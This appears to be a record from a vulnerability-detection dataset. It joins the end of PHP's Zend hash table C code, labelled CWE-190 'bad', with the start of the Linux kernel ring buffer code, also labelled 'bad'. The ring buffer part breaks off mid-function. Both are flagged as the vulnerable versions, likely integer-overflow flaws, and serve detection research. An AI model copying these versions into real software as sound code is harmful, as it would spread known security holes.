HASH_PROTECT_RECURSION(ht1);
HASH_PROTECT_RECURSION(ht2);
result = zend_hash_compare_impl(ht1, ht2, compar, ordered);
HASH_UNPROTECT_RECURSION(ht1);
HASH_UNPROTECT_RECURSION(ht2);
return result;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_minmax(const HashTable *ht, compare_func_t compar, uint32_t flag)
{
uint32_t idx;
Bucket *p, *res;
IS_CONSISTENT(ht);
if (ht->nNumOfElements == 0 ) {
return NULL;
}
idx = 0;
while (1) {
if (idx == ht->nNumUsed) {
return NULL;
}
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) break;
idx++;
}
res = ht->arData + idx;
for (; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (flag) {
if (compar(res, p) < 0) { /* max */
res = p;
}
} else {
if (compar(res, p) > 0) { /* min */
res = p;
}
}
}
return &res->val;
}
ZEND_API int ZEND_FASTCALL _zend_handle_numeric_str_ex(const char *key, size_t length, zend_ulong *idx)
{
register const char *tmp = key;
const char *end = key + length;
if (*tmp == '-') {
tmp++;
}
if ((*tmp == '0' && length > 1) /* numbers with leading zeros */
|| (end - tmp > MAX_LENGTH_OF_LONG - 1) /* number too long */
|| (SIZEOF_ZEND_LONG == 4 &&
end - tmp == MAX_LENGTH_OF_LONG - 1 &&
*tmp > '2')) { /* overflow */
return 0;
}
*idx = (*tmp - '0');
while (1) {
++tmp;
if (tmp == end) {
if (*key == '-') {
if (*idx-1 > ZEND_LONG_MAX) { /* overflow */
return 0;
}
*idx = 0 - *idx;
} else if (*idx > ZEND_LONG_MAX) { /* overflow */
return 0;
}
return 1;
}
if (*tmp <= '9' && *tmp >= '0') {
*idx = (*idx * 10) + (*tmp - '0');
} else {
return 0;
}
}
}
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* indent-tabs-mode: t
* End:
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3089_0 |
crossvul-cpp_data_bad_5498_0 | /*
* Generic ring buffer
*
* Copyright (C) 2008 Steven Rostedt <srostedt@redhat.com>
*/
#include <linux/trace_events.h>
#include <linux/ring_buffer.h>
#include <linux/trace_clock.h>
#include <linux/trace_seq.h>
#include <linux/spinlock.h>
#include <linux/irq_work.h>
#include <linux/uaccess.h>
#include <linux/hardirq.h>
#include <linux/kthread.h> /* for self test */
#include <linux/kmemcheck.h>
#include <linux/module.h>
#include <linux/percpu.h>
#include <linux/mutex.h>
#include <linux/delay.h>
#include <linux/slab.h>
#include <linux/init.h>
#include <linux/hash.h>
#include <linux/list.h>
#include <linux/cpu.h>
#include <asm/local.h>
static void update_pages_handler(struct work_struct *work);
/*
* The ring buffer header is special. We must manually up keep it.
*/
int ring_buffer_print_entry_header(struct trace_seq *s)
{
trace_seq_puts(s, "# compressed entry header\n");
trace_seq_puts(s, "\ttype_len : 5 bits\n");
trace_seq_puts(s, "\ttime_delta : 27 bits\n");
trace_seq_puts(s, "\tarray : 32 bits\n");
trace_seq_putc(s, '\n');
trace_seq_printf(s, "\tpadding : type == %d\n",
RINGBUF_TYPE_PADDING);
trace_seq_printf(s, "\ttime_extend : type == %d\n",
RINGBUF_TYPE_TIME_EXTEND);
trace_seq_printf(s, "\tdata max type_len == %d\n",
RINGBUF_TYPE_DATA_TYPE_LEN_MAX);
return !trace_seq_has_overflowed(s);
}
/*
* The ring buffer is made up of a list of pages. A separate list of pages is
* allocated for each CPU. A writer may only write to a buffer that is
* associated with the CPU it is currently executing on. A reader may read
* from any per cpu buffer.
*
* The reader is special. For each per cpu buffer, the reader has its own
* reader page. When a reader has read the entire reader page, this reader
* page is swapped with another page in the ring buffer.
*
* Now, as long as the writer is off the reader page, the reader can do what
* ever it wants with that page. The writer will never write to that page
* again (as long as it is out of the ring buffer).
*
* Here's some silly ASCII art.
*
* +------+
* |reader| RING BUFFER
* |page |
* +------+ +---+ +---+ +---+
* | |-->| |-->| |
* +---+ +---+ +---+
* ^ |
* | |
* +---------------+
*
*
* +------+
* |reader| RING BUFFER
* |page |------------------v
* +------+ +---+ +---+ +---+
* | |-->| |-->| |
* +---+ +---+ +---+
* ^ |
* | |
* +---------------+
*
*
* +------+
* |reader| RING BUFFER
* |page |------------------v
* +------+ +---+ +---+ +---+
* ^ | |-->| |-->| |
* | +---+ +---+ +---+
* | |
* | |
* +------------------------------+
*
*
* +------+
* |buffer| RING BUFFER
* |page |------------------v
* +------+ +---+ +---+ +---+
* ^ | | | |-->| |
* | New +---+ +---+ +---+
* | Reader------^ |
* | page |
* +------------------------------+
*
*
* After we make this swap, the reader can hand this page off to the splice
* code and be done with it. It can even allocate a new page if it needs to
* and swap that into the ring buffer.
*
* We will be using cmpxchg soon to make all this lockless.
*
*/
/* Used for individual buffers (after the counter) */
#define RB_BUFFER_OFF (1 << 20)
#define BUF_PAGE_HDR_SIZE offsetof(struct buffer_data_page, data)
#define RB_EVNT_HDR_SIZE (offsetof(struct ring_buffer_event, array))
#define RB_ALIGNMENT 4U
#define RB_MAX_SMALL_DATA (RB_ALIGNMENT * RINGBUF_TYPE_DATA_TYPE_LEN_MAX)
#define RB_EVNT_MIN_SIZE 8U /* two 32bit words */
#ifndef CONFIG_HAVE_64BIT_ALIGNED_ACCESS
# define RB_FORCE_8BYTE_ALIGNMENT 0
# define RB_ARCH_ALIGNMENT RB_ALIGNMENT
#else
# define RB_FORCE_8BYTE_ALIGNMENT 1
# define RB_ARCH_ALIGNMENT 8U
#endif
#define RB_ALIGN_DATA __aligned(RB_ARCH_ALIGNMENT)
/* define RINGBUF_TYPE_DATA for 'case RINGBUF_TYPE_DATA:' */
#define RINGBUF_TYPE_DATA 0 ... RINGBUF_TYPE_DATA_TYPE_LEN_MAX
enum {
RB_LEN_TIME_EXTEND = 8,
RB_LEN_TIME_STAMP = 16,
};
#define skip_time_extend(event) \
((struct ring_buffer_event *)((char *)event + RB_LEN_TIME_EXTEND))
static inline int rb_null_event(struct ring_buffer_event *event)
{
return event->type_len == RINGBUF_TYPE_PADDING && !event->time_delta;
}
static void rb_event_set_padding(struct ring_buffer_event *event)
{
/* padding has a NULL time_delta */
event->type_len = RINGBUF_TYPE_PADDING;
event->time_delta = 0;
}
static unsigned
rb_event_data_length(struct ring_buffer_event *event)
{
unsigned length;
if (event->type_len)
length = event->type_len * RB_ALIGNMENT;
else
length = event->array[0];
return length + RB_EVNT_HDR_SIZE;
}
/*
* Return the length of the given event. Will return
* the length of the time extend if the event is a
* time extend.
*/
static inline unsigned
rb_event_length(struct ring_buffer_event *event)
{
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
if (rb_null_event(event))
/* undefined */
return -1;
return event->array[0] + RB_EVNT_HDR_SIZE;
case RINGBUF_TYPE_TIME_EXTEND:
return RB_LEN_TIME_EXTEND;
case RINGBUF_TYPE_TIME_STAMP:
return RB_LEN_TIME_STAMP;
case RINGBUF_TYPE_DATA:
return rb_event_data_length(event);
default:
BUG();
}
/* not hit */
return 0;
}
/*
* Return total length of time extend and data,
* or just the event length for all other events.
*/
static inline unsigned
rb_event_ts_length(struct ring_buffer_event *event)
{
unsigned len = 0;
if (event->type_len == RINGBUF_TYPE_TIME_EXTEND) {
/* time extends include the data event after it */
len = RB_LEN_TIME_EXTEND;
event = skip_time_extend(event);
}
return len + rb_event_length(event);
}
/**
* ring_buffer_event_length - return the length of the event
* @event: the event to get the length of
*
* Returns the size of the data load of a data event.
* If the event is something other than a data event, it
* returns the size of the event itself. With the exception
* of a TIME EXTEND, where it still returns the size of the
* data load of the data event after it.
*/
unsigned ring_buffer_event_length(struct ring_buffer_event *event)
{
unsigned length;
if (event->type_len == RINGBUF_TYPE_TIME_EXTEND)
event = skip_time_extend(event);
length = rb_event_length(event);
if (event->type_len > RINGBUF_TYPE_DATA_TYPE_LEN_MAX)
return length;
length -= RB_EVNT_HDR_SIZE;
if (length > RB_MAX_SMALL_DATA + sizeof(event->array[0]))
length -= sizeof(event->array[0]);
return length;
}
EXPORT_SYMBOL_GPL(ring_buffer_event_length);
/* inline for ring buffer fast paths */
static void *
rb_event_data(struct ring_buffer_event *event)
{
if (event->type_len == RINGBUF_TYPE_TIME_EXTEND)
event = skip_time_extend(event);
BUG_ON(event->type_len > RINGBUF_TYPE_DATA_TYPE_LEN_MAX);
/* If length is in len field, then array[0] has the data */
if (event->type_len)
return (void *)&event->array[0];
/* Otherwise length is in array[0] and array[1] has the data */
return (void *)&event->array[1];
}
/**
* ring_buffer_event_data - return the data of the event
* @event: the event to get the data from
*/
void *ring_buffer_event_data(struct ring_buffer_event *event)
{
return rb_event_data(event);
}
EXPORT_SYMBOL_GPL(ring_buffer_event_data);
#define for_each_buffer_cpu(buffer, cpu) \
for_each_cpu(cpu, buffer->cpumask)
#define TS_SHIFT 27
#define TS_MASK ((1ULL << TS_SHIFT) - 1)
#define TS_DELTA_TEST (~TS_MASK)
/* Flag when events were overwritten */
#define RB_MISSED_EVENTS (1 << 31)
/* Missed count stored at end */
#define RB_MISSED_STORED (1 << 30)
struct buffer_data_page {
u64 time_stamp; /* page time stamp */
local_t commit; /* write committed index */
unsigned char data[] RB_ALIGN_DATA; /* data of buffer page */
};
/*
* Note, the buffer_page list must be first. The buffer pages
* are allocated in cache lines, which means that each buffer
* page will be at the beginning of a cache line, and thus
* the least significant bits will be zero. We use this to
* add flags in the list struct pointers, to make the ring buffer
* lockless.
*/
struct buffer_page {
struct list_head list; /* list of buffer pages */
local_t write; /* index for next write */
unsigned read; /* index for next read */
local_t entries; /* entries on this page */
unsigned long real_end; /* real end of data */
struct buffer_data_page *page; /* Actual data page */
};
/*
* The buffer page counters, write and entries, must be reset
* atomically when crossing page boundaries. To synchronize this
* update, two counters are inserted into the number. One is
* the actual counter for the write position or count on the page.
*
* The other is a counter of updaters. Before an update happens
* the update partition of the counter is incremented. This will
* allow the updater to update the counter atomically.
*
* The counter is 20 bits, and the state data is 12.
*/
#define RB_WRITE_MASK 0xfffff
#define RB_WRITE_INTCNT (1 << 20)
static void rb_init_page(struct buffer_data_page *bpage)
{
local_set(&bpage->commit, 0);
}
/**
* ring_buffer_page_len - the size of data on the page.
* @page: The page to read
*
* Returns the amount of data on the page, including buffer page header.
*/
size_t ring_buffer_page_len(void *page)
{
return local_read(&((struct buffer_data_page *)page)->commit)
+ BUF_PAGE_HDR_SIZE;
}
/*
* Also stolen from mm/slob.c. Thanks to Mathieu Desnoyers for pointing
* this issue out.
*/
static void free_buffer_page(struct buffer_page *bpage)
{
free_page((unsigned long)bpage->page);
kfree(bpage);
}
/*
* We need to fit the time_stamp delta into 27 bits.
*/
static inline int test_time_stamp(u64 delta)
{
if (delta & TS_DELTA_TEST)
return 1;
return 0;
}
#define BUF_PAGE_SIZE (PAGE_SIZE - BUF_PAGE_HDR_SIZE)
/* Max payload is BUF_PAGE_SIZE - header (8bytes) */
#define BUF_MAX_DATA_SIZE (BUF_PAGE_SIZE - (sizeof(u32) * 2))
int ring_buffer_print_page_header(struct trace_seq *s)
{
struct buffer_data_page field;
trace_seq_printf(s, "\tfield: u64 timestamp;\t"
"offset:0;\tsize:%u;\tsigned:%u;\n",
(unsigned int)sizeof(field.time_stamp),
(unsigned int)is_signed_type(u64));
trace_seq_printf(s, "\tfield: local_t commit;\t"
"offset:%u;\tsize:%u;\tsigned:%u;\n",
(unsigned int)offsetof(typeof(field), commit),
(unsigned int)sizeof(field.commit),
(unsigned int)is_signed_type(long));
trace_seq_printf(s, "\tfield: int overwrite;\t"
"offset:%u;\tsize:%u;\tsigned:%u;\n",
(unsigned int)offsetof(typeof(field), commit),
1,
(unsigned int)is_signed_type(long));
trace_seq_printf(s, "\tfield: char data;\t"
"offset:%u;\tsize:%u;\tsigned:%u;\n",
(unsigned int)offsetof(typeof(field), data),
(unsigned int)BUF_PAGE_SIZE,
(unsigned int)is_signed_type(char));
return !trace_seq_has_overflowed(s);
}
struct rb_irq_work {
struct irq_work work;
wait_queue_head_t waiters;
wait_queue_head_t full_waiters;
bool waiters_pending;
bool full_waiters_pending;
bool wakeup_full;
};
/*
* Structure to hold event state and handle nested events.
*/
struct rb_event_info {
u64 ts;
u64 delta;
unsigned long length;
struct buffer_page *tail_page;
int add_timestamp;
};
/*
* Used for which event context the event is in.
* NMI = 0
* IRQ = 1
* SOFTIRQ = 2
* NORMAL = 3
*
* See trace_recursive_lock() comment below for more details.
*/
enum {
RB_CTX_NMI,
RB_CTX_IRQ,
RB_CTX_SOFTIRQ,
RB_CTX_NORMAL,
RB_CTX_MAX
};
/*
* head_page == tail_page && head == tail then buffer is empty.
*/
struct ring_buffer_per_cpu {
int cpu;
atomic_t record_disabled;
struct ring_buffer *buffer;
raw_spinlock_t reader_lock; /* serialize readers */
arch_spinlock_t lock;
struct lock_class_key lock_key;
unsigned long nr_pages;
unsigned int current_context;
struct list_head *pages;
struct buffer_page *head_page; /* read from head */
struct buffer_page *tail_page; /* write to tail */
struct buffer_page *commit_page; /* committed pages */
struct buffer_page *reader_page;
unsigned long lost_events;
unsigned long last_overrun;
local_t entries_bytes;
local_t entries;
local_t overrun;
local_t commit_overrun;
local_t dropped_events;
local_t committing;
local_t commits;
unsigned long read;
unsigned long read_bytes;
u64 write_stamp;
u64 read_stamp;
/* ring buffer pages to update, > 0 to add, < 0 to remove */
long nr_pages_to_update;
struct list_head new_pages; /* new pages to add */
struct work_struct update_pages_work;
struct completion update_done;
struct rb_irq_work irq_work;
};
struct ring_buffer {
unsigned flags;
int cpus;
atomic_t record_disabled;
atomic_t resize_disabled;
cpumask_var_t cpumask;
struct lock_class_key *reader_lock_key;
struct mutex mutex;
struct ring_buffer_per_cpu **buffers;
#ifdef CONFIG_HOTPLUG_CPU
struct notifier_block cpu_notify;
#endif
u64 (*clock)(void);
struct rb_irq_work irq_work;
};
struct ring_buffer_iter {
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long head;
struct buffer_page *head_page;
struct buffer_page *cache_reader_page;
unsigned long cache_read;
u64 read_stamp;
};
/*
* rb_wake_up_waiters - wake up tasks waiting for ring buffer input
*
* Schedules a delayed work to wake up any task that is blocked on the
* ring buffer waiters queue.
*/
static void rb_wake_up_waiters(struct irq_work *work)
{
struct rb_irq_work *rbwork = container_of(work, struct rb_irq_work, work);
wake_up_all(&rbwork->waiters);
if (rbwork->wakeup_full) {
rbwork->wakeup_full = false;
wake_up_all(&rbwork->full_waiters);
}
}
/**
* ring_buffer_wait - wait for input to the ring buffer
* @buffer: buffer to wait on
* @cpu: the cpu buffer to wait on
* @full: wait until a full page is available, if @cpu != RING_BUFFER_ALL_CPUS
*
* If @cpu == RING_BUFFER_ALL_CPUS then the task will wake up as soon
* as data is added to any of the @buffer's cpu buffers. Otherwise
* it will wait for data to be added to a specific cpu buffer.
*/
int ring_buffer_wait(struct ring_buffer *buffer, int cpu, bool full)
{
struct ring_buffer_per_cpu *uninitialized_var(cpu_buffer);
DEFINE_WAIT(wait);
struct rb_irq_work *work;
int ret = 0;
/*
* Depending on what the caller is waiting for, either any
* data in any cpu buffer, or a specific buffer, put the
* caller on the appropriate wait queue.
*/
if (cpu == RING_BUFFER_ALL_CPUS) {
work = &buffer->irq_work;
/* Full only makes sense on per cpu reads */
full = false;
} else {
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return -ENODEV;
cpu_buffer = buffer->buffers[cpu];
work = &cpu_buffer->irq_work;
}
while (true) {
if (full)
prepare_to_wait(&work->full_waiters, &wait, TASK_INTERRUPTIBLE);
else
prepare_to_wait(&work->waiters, &wait, TASK_INTERRUPTIBLE);
/*
* The events can happen in critical sections where
* checking a work queue can cause deadlocks.
* After adding a task to the queue, this flag is set
* only to notify events to try to wake up the queue
* using irq_work.
*
* We don't clear it even if the buffer is no longer
* empty. The flag only causes the next event to run
* irq_work to do the work queue wake up. The worse
* that can happen if we race with !trace_empty() is that
* an event will cause an irq_work to try to wake up
* an empty queue.
*
* There's no reason to protect this flag either, as
* the work queue and irq_work logic will do the necessary
* synchronization for the wake ups. The only thing
* that is necessary is that the wake up happens after
* a task has been queued. It's OK for spurious wake ups.
*/
if (full)
work->full_waiters_pending = true;
else
work->waiters_pending = true;
if (signal_pending(current)) {
ret = -EINTR;
break;
}
if (cpu == RING_BUFFER_ALL_CPUS && !ring_buffer_empty(buffer))
break;
if (cpu != RING_BUFFER_ALL_CPUS &&
!ring_buffer_empty_cpu(buffer, cpu)) {
unsigned long flags;
bool pagebusy;
if (!full)
break;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
pagebusy = cpu_buffer->reader_page == cpu_buffer->commit_page;
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
if (!pagebusy)
break;
}
schedule();
}
if (full)
finish_wait(&work->full_waiters, &wait);
else
finish_wait(&work->waiters, &wait);
return ret;
}
/**
* ring_buffer_poll_wait - poll on buffer input
* @buffer: buffer to wait on
* @cpu: the cpu buffer to wait on
* @filp: the file descriptor
* @poll_table: The poll descriptor
*
* If @cpu == RING_BUFFER_ALL_CPUS then the task will wake up as soon
* as data is added to any of the @buffer's cpu buffers. Otherwise
* it will wait for data to be added to a specific cpu buffer.
*
* Returns POLLIN | POLLRDNORM if data exists in the buffers,
* zero otherwise.
*/
int ring_buffer_poll_wait(struct ring_buffer *buffer, int cpu,
struct file *filp, poll_table *poll_table)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct rb_irq_work *work;
if (cpu == RING_BUFFER_ALL_CPUS)
work = &buffer->irq_work;
else {
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return -EINVAL;
cpu_buffer = buffer->buffers[cpu];
work = &cpu_buffer->irq_work;
}
poll_wait(filp, &work->waiters, poll_table);
work->waiters_pending = true;
/*
* There's a tight race between setting the waiters_pending and
* checking if the ring buffer is empty. Once the waiters_pending bit
* is set, the next event will wake the task up, but we can get stuck
* if there's only a single event in.
*
* FIXME: Ideally, we need a memory barrier on the writer side as well,
* but adding a memory barrier to all events will cause too much of a
* performance hit in the fast path. We only need a memory barrier when
* the buffer goes from empty to having content. But as this race is
* extremely small, and it's not a problem if another event comes in, we
* will fix it later.
*/
smp_mb();
if ((cpu == RING_BUFFER_ALL_CPUS && !ring_buffer_empty(buffer)) ||
(cpu != RING_BUFFER_ALL_CPUS && !ring_buffer_empty_cpu(buffer, cpu)))
return POLLIN | POLLRDNORM;
return 0;
}
/* buffer may be either ring_buffer or ring_buffer_per_cpu */
#define RB_WARN_ON(b, cond) \
({ \
int _____ret = unlikely(cond); \
if (_____ret) { \
if (__same_type(*(b), struct ring_buffer_per_cpu)) { \
struct ring_buffer_per_cpu *__b = \
(void *)b; \
atomic_inc(&__b->buffer->record_disabled); \
} else \
atomic_inc(&b->record_disabled); \
WARN_ON(1); \
} \
_____ret; \
})
/* Up this if you want to test the TIME_EXTENTS and normalization */
#define DEBUG_SHIFT 0
static inline u64 rb_time_stamp(struct ring_buffer *buffer)
{
/* shift to debug/test normalization and TIME_EXTENTS */
return buffer->clock() << DEBUG_SHIFT;
}
u64 ring_buffer_time_stamp(struct ring_buffer *buffer, int cpu)
{
u64 time;
preempt_disable_notrace();
time = rb_time_stamp(buffer);
preempt_enable_no_resched_notrace();
return time;
}
EXPORT_SYMBOL_GPL(ring_buffer_time_stamp);
void ring_buffer_normalize_time_stamp(struct ring_buffer *buffer,
int cpu, u64 *ts)
{
/* Just stupid testing the normalize function and deltas */
*ts >>= DEBUG_SHIFT;
}
EXPORT_SYMBOL_GPL(ring_buffer_normalize_time_stamp);
/*
* Making the ring buffer lockless makes things tricky.
* Although writes only happen on the CPU that they are on,
* and they only need to worry about interrupts. Reads can
* happen on any CPU.
*
* The reader page is always off the ring buffer, but when the
* reader finishes with a page, it needs to swap its page with
* a new one from the buffer. The reader needs to take from
* the head (writes go to the tail). But if a writer is in overwrite
* mode and wraps, it must push the head page forward.
*
* Here lies the problem.
*
* The reader must be careful to replace only the head page, and
* not another one. As described at the top of the file in the
* ASCII art, the reader sets its old page to point to the next
* page after head. It then sets the page after head to point to
* the old reader page. But if the writer moves the head page
* during this operation, the reader could end up with the tail.
*
* We use cmpxchg to help prevent this race. We also do something
* special with the page before head. We set the LSB to 1.
*
* When the writer must push the page forward, it will clear the
* bit that points to the head page, move the head, and then set
* the bit that points to the new head page.
*
* We also don't want an interrupt coming in and moving the head
* page on another writer. Thus we use the second LSB to catch
* that too. Thus:
*
* head->list->prev->next bit 1 bit 0
* ------- -------
* Normal page 0 0
* Points to head page 0 1
* New head page 1 0
*
* Note we can not trust the prev pointer of the head page, because:
*
* +----+ +-----+ +-----+
* | |------>| T |---X--->| N |
* | |<------| | | |
* +----+ +-----+ +-----+
* ^ ^ |
* | +-----+ | |
* +----------| R |----------+ |
* | |<-----------+
* +-----+
*
* Key: ---X--> HEAD flag set in pointer
* T Tail page
* R Reader page
* N Next page
*
* (see __rb_reserve_next() to see where this happens)
*
* What the above shows is that the reader just swapped out
* the reader page with a page in the buffer, but before it
* could make the new header point back to the new page added
* it was preempted by a writer. The writer moved forward onto
* the new page added by the reader and is about to move forward
* again.
*
* You can see, it is legitimate for the previous pointer of
* the head (or any page) not to point back to itself. But only
* temporarially.
*/
#define RB_PAGE_NORMAL 0UL
#define RB_PAGE_HEAD 1UL
#define RB_PAGE_UPDATE 2UL
#define RB_FLAG_MASK 3UL
/* PAGE_MOVED is not part of the mask */
#define RB_PAGE_MOVED 4UL
/*
* rb_list_head - remove any bit
*/
static struct list_head *rb_list_head(struct list_head *list)
{
unsigned long val = (unsigned long)list;
return (struct list_head *)(val & ~RB_FLAG_MASK);
}
/*
* rb_is_head_page - test if the given page is the head page
*
* Because the reader may move the head_page pointer, we can
* not trust what the head page is (it may be pointing to
* the reader page). But if the next page is a header page,
* its flags will be non zero.
*/
static inline int
rb_is_head_page(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *page, struct list_head *list)
{
unsigned long val;
val = (unsigned long)list->next;
if ((val & ~RB_FLAG_MASK) != (unsigned long)&page->list)
return RB_PAGE_MOVED;
return val & RB_FLAG_MASK;
}
/*
* rb_is_reader_page
*
* The unique thing about the reader page, is that, if the
* writer is ever on it, the previous pointer never points
* back to the reader page.
*/
static bool rb_is_reader_page(struct buffer_page *page)
{
struct list_head *list = page->list.prev;
return rb_list_head(list->next) != &page->list;
}
/*
* rb_set_list_to_head - set a list_head to be pointing to head.
*/
static void rb_set_list_to_head(struct ring_buffer_per_cpu *cpu_buffer,
struct list_head *list)
{
unsigned long *ptr;
ptr = (unsigned long *)&list->next;
*ptr |= RB_PAGE_HEAD;
*ptr &= ~RB_PAGE_UPDATE;
}
/*
* rb_head_page_activate - sets up head page
*/
static void rb_head_page_activate(struct ring_buffer_per_cpu *cpu_buffer)
{
struct buffer_page *head;
head = cpu_buffer->head_page;
if (!head)
return;
/*
* Set the previous list pointer to have the HEAD flag.
*/
rb_set_list_to_head(cpu_buffer, head->list.prev);
}
static void rb_list_head_clear(struct list_head *list)
{
unsigned long *ptr = (unsigned long *)&list->next;
*ptr &= ~RB_FLAG_MASK;
}
/*
* rb_head_page_dactivate - clears head page ptr (for free list)
*/
static void
rb_head_page_deactivate(struct ring_buffer_per_cpu *cpu_buffer)
{
struct list_head *hd;
/* Go through the whole list and clear any pointers found. */
rb_list_head_clear(cpu_buffer->pages);
list_for_each(hd, cpu_buffer->pages)
rb_list_head_clear(hd);
}
static int rb_head_page_set(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *head,
struct buffer_page *prev,
int old_flag, int new_flag)
{
struct list_head *list;
unsigned long val = (unsigned long)&head->list;
unsigned long ret;
list = &prev->list;
val &= ~RB_FLAG_MASK;
ret = cmpxchg((unsigned long *)&list->next,
val | old_flag, val | new_flag);
/* check if the reader took the page */
if ((ret & ~RB_FLAG_MASK) != val)
return RB_PAGE_MOVED;
return ret & RB_FLAG_MASK;
}
static int rb_head_page_set_update(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *head,
struct buffer_page *prev,
int old_flag)
{
return rb_head_page_set(cpu_buffer, head, prev,
old_flag, RB_PAGE_UPDATE);
}
static int rb_head_page_set_head(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *head,
struct buffer_page *prev,
int old_flag)
{
return rb_head_page_set(cpu_buffer, head, prev,
old_flag, RB_PAGE_HEAD);
}
static int rb_head_page_set_normal(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *head,
struct buffer_page *prev,
int old_flag)
{
return rb_head_page_set(cpu_buffer, head, prev,
old_flag, RB_PAGE_NORMAL);
}
static inline void rb_inc_page(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page **bpage)
{
struct list_head *p = rb_list_head((*bpage)->list.next);
*bpage = list_entry(p, struct buffer_page, list);
}
static struct buffer_page *
rb_set_head_page(struct ring_buffer_per_cpu *cpu_buffer)
{
struct buffer_page *head;
struct buffer_page *page;
struct list_head *list;
int i;
if (RB_WARN_ON(cpu_buffer, !cpu_buffer->head_page))
return NULL;
/* sanity check */
list = cpu_buffer->pages;
if (RB_WARN_ON(cpu_buffer, rb_list_head(list->prev->next) != list))
return NULL;
page = head = cpu_buffer->head_page;
/*
* It is possible that the writer moves the header behind
* where we started, and we miss in one loop.
* A second loop should grab the header, but we'll do
* three loops just because I'm paranoid.
*/
for (i = 0; i < 3; i++) {
do {
if (rb_is_head_page(cpu_buffer, page, page->list.prev)) {
cpu_buffer->head_page = page;
return page;
}
rb_inc_page(cpu_buffer, &page);
} while (page != head);
}
RB_WARN_ON(cpu_buffer, 1);
return NULL;
}
static int rb_head_page_replace(struct buffer_page *old,
struct buffer_page *new)
{
unsigned long *ptr = (unsigned long *)&old->list.prev->next;
unsigned long val;
unsigned long ret;
val = *ptr & ~RB_FLAG_MASK;
val |= RB_PAGE_HEAD;
ret = cmpxchg(ptr, val, (unsigned long)&new->list);
return ret == val;
}
/*
* rb_tail_page_update - move the tail page forward
*/
static void rb_tail_page_update(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *tail_page,
struct buffer_page *next_page)
{
unsigned long old_entries;
unsigned long old_write;
/*
* The tail page now needs to be moved forward.
*
* We need to reset the tail page, but without messing
* with possible erasing of data brought in by interrupts
* that have moved the tail page and are currently on it.
*
* We add a counter to the write field to denote this.
*/
old_write = local_add_return(RB_WRITE_INTCNT, &next_page->write);
old_entries = local_add_return(RB_WRITE_INTCNT, &next_page->entries);
/*
* Just make sure we have seen our old_write and synchronize
* with any interrupts that come in.
*/
barrier();
/*
* If the tail page is still the same as what we think
* it is, then it is up to us to update the tail
* pointer.
*/
if (tail_page == READ_ONCE(cpu_buffer->tail_page)) {
/* Zero the write counter */
unsigned long val = old_write & ~RB_WRITE_MASK;
unsigned long eval = old_entries & ~RB_WRITE_MASK;
/*
* This will only succeed if an interrupt did
* not come in and change it. In which case, we
* do not want to modify it.
*
* We add (void) to let the compiler know that we do not care
* about the return value of these functions. We use the
* cmpxchg to only update if an interrupt did not already
* do it for us. If the cmpxchg fails, we don't care.
*/
(void)local_cmpxchg(&next_page->write, old_write, val);
(void)local_cmpxchg(&next_page->entries, old_entries, eval);
/*
* No need to worry about races with clearing out the commit.
* it only can increment when a commit takes place. But that
* only happens in the outer most nested commit.
*/
local_set(&next_page->page->commit, 0);
/* Again, either we update tail_page or an interrupt does */
(void)cmpxchg(&cpu_buffer->tail_page, tail_page, next_page);
}
}
static int rb_check_bpage(struct ring_buffer_per_cpu *cpu_buffer,
struct buffer_page *bpage)
{
unsigned long val = (unsigned long)bpage;
if (RB_WARN_ON(cpu_buffer, val & RB_FLAG_MASK))
return 1;
return 0;
}
/**
* rb_check_list - make sure a pointer to a list has the last bits zero
*/
static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
struct list_head *list)
{
if (RB_WARN_ON(cpu_buffer, rb_list_head(list->prev) != list->prev))
return 1;
if (RB_WARN_ON(cpu_buffer, rb_list_head(list->next) != list->next))
return 1;
return 0;
}
/**
* rb_check_pages - integrity check of buffer pages
* @cpu_buffer: CPU buffer with pages to test
*
* As a safety measure we check to make sure the data pages have not
* been corrupted.
*/
static int rb_check_pages(struct ring_buffer_per_cpu *cpu_buffer)
{
struct list_head *head = cpu_buffer->pages;
struct buffer_page *bpage, *tmp;
/* Reset the head page if it exists */
if (cpu_buffer->head_page)
rb_set_head_page(cpu_buffer);
rb_head_page_deactivate(cpu_buffer);
if (RB_WARN_ON(cpu_buffer, head->next->prev != head))
return -1;
if (RB_WARN_ON(cpu_buffer, head->prev->next != head))
return -1;
if (rb_check_list(cpu_buffer, head))
return -1;
list_for_each_entry_safe(bpage, tmp, head, list) {
if (RB_WARN_ON(cpu_buffer,
bpage->list.next->prev != &bpage->list))
return -1;
if (RB_WARN_ON(cpu_buffer,
bpage->list.prev->next != &bpage->list))
return -1;
if (rb_check_list(cpu_buffer, &bpage->list))
return -1;
}
rb_head_page_activate(cpu_buffer);
return 0;
}
static int __rb_allocate_pages(long nr_pages, struct list_head *pages, int cpu)
{
struct buffer_page *bpage, *tmp;
long i;
for (i = 0; i < nr_pages; i++) {
struct page *page;
/*
* __GFP_NORETRY flag makes sure that the allocation fails
* gracefully without invoking oom-killer and the system is
* not destabilized.
*/
bpage = kzalloc_node(ALIGN(sizeof(*bpage), cache_line_size()),
GFP_KERNEL | __GFP_NORETRY,
cpu_to_node(cpu));
if (!bpage)
goto free_pages;
list_add(&bpage->list, pages);
page = alloc_pages_node(cpu_to_node(cpu),
GFP_KERNEL | __GFP_NORETRY, 0);
if (!page)
goto free_pages;
bpage->page = page_address(page);
rb_init_page(bpage->page);
}
return 0;
free_pages:
list_for_each_entry_safe(bpage, tmp, pages, list) {
list_del_init(&bpage->list);
